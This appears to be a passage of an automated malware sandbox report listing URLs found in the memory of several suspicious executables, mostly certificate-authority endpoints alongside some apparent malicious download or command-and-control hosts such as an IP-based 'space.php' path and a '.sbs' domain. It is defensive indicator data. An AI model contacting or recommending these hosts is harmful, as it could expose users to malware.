                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.php8W
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1445572018.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444654791.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1444133559.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.php=W
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.phpA3
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1510180212.00000000040FA000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1507362757.00000000040F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://5.42.66.10/download/th/space.phpj
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                        Source: file.exe, 00000000.00000002.1323600743.0000027F39071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1323600743.0000027F3A57C000.00000004.00001000.00020000.00000000.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                        Source: file.exe, 00000000.00000002.1323600743.0000027F39071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1323600743.0000027F3A57C000.00000004.00001000.00020000.00000000.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: http://devlog.gregarius.net/docs/ua)Links
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpString found in binary or memory: http://download.iolo.net
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.00000000070FA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnection
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpString found in binary or memory: http://google.com
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: http://invalidlog.txtlookup
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: http://localhost:3433/https://duniadekho.baridna:
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0H
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0I
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0L
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0O
                        Source: file.exe, 00000000.00000002.1323600743.0000027F39071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1323600743.0000027F3A57C000.00000004.00001000.00020000.00000000.sdmp, VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006E35000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006E25000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006F65000.00000004.00000020.00020000.00000000.sdmp, t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0
                        Source: t7IXQJi6R3tWUMJ8f9cQzMWm.exe, 00000015.00000003.1761896384.0000000007243000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000018.00000002.2096381069.0000000005073000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.sectigo.com0&
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.thawte.com0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                        Source: file.exe, 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1314917888.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidpP
                        Source: file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidpP#
                        Source: file.exe, 00000000.00000002.1327386065.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000000.1314917888.00007FF6388B2000.00000008.00000001.01000000.00000003.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepP
                        Source: file.exe, 00000000.00000002.1326287625.0000027F49071000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepP#
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)msnbot/1.1
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)net/http:
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: http://search.msn.com/msnbot.htm)pkcs7:
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crl0f
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcb.com/sf.crt0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sf.symcd.com0&
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0a
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.000000000739E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                        Source: VtmtVe55Jwcf3rOGIU1yezyh.exe, 00000004.00000003.1624901520.0000000006A49000.00000004.00000020.00020000.00000000.sdmp, yPlMO3UKyKRvoEYPhbGYOyT0.exe, 0000000B.00000003.1635257524.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, B46afLBMY0mokUgVdA9CQR52.exe, 00000013.00000003.1674965384.0000000006B79000.00000004.00000020.00020000.00000000.sdmp, u69w.1.exe, 00000023.00000000.1537903237.000000000041C000.00000020.00000001.01000000.0000001A.sdmpString found in binary or memory: http://svc.iolo.com/__svc/sbv/DownloadManager.ashx
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://togaterecutirenics.sbs/
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://togaterecutirenics.sbs/0
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1506874519.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1455160255.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1492726768.0000000002B35000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1496087050.0000000002B35000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://togaterecutirenics.sbs/rt
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://togaterecutirenics.sbs/rtO
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1447829386.0000000002B36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://togaterecutirenics.sbs/rtxe3W
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
                        Source: Qg_Appv5.exe, 00000018.00000002.2204224716.0000000007353000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com07
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480209801.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479436217.0000000004164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wikkt.com/
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484968628.0000000004164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wikkt.com/forum/index.php
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1488155637.0000000004165000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480209801.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479436217.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484968628.0000000004164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wikkt.com/forum/index.php3su
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1488155637.0000000004165000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1464787413.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1480209801.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479436217.0000000004164000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1484968628.0000000004164000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wikkt.com/forum/index.phpEsc
                        Source: 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1477033199.0000000002AF7000.00000004.00000020.00020000.00000000.sdmp, 9wqoiPpK0NIQEBygxfm6h42G.exe, 00000005.00000003.1479500645.0000000002AF7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://wikkt.com/m
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: http://www.avantbrowser.com)MOT-V9mm/00.62
                        Source: PA8JWMmRYiQsN7iqTjOvjsbW.exe, 00000020.00000001.1883456337.0000000000400000.00000040.00000001.01000000.00000017.sdmp, zUOgRazdYnb35XHU4UIsV9Yc.exe, 00000021.00000001.1945506899.0000000000400000.00000040.00000001.01000000.00000018.sdmpString found in binary or memory: http://www.baidu.com/search/spider.htm)MobileSafari/600.1.4
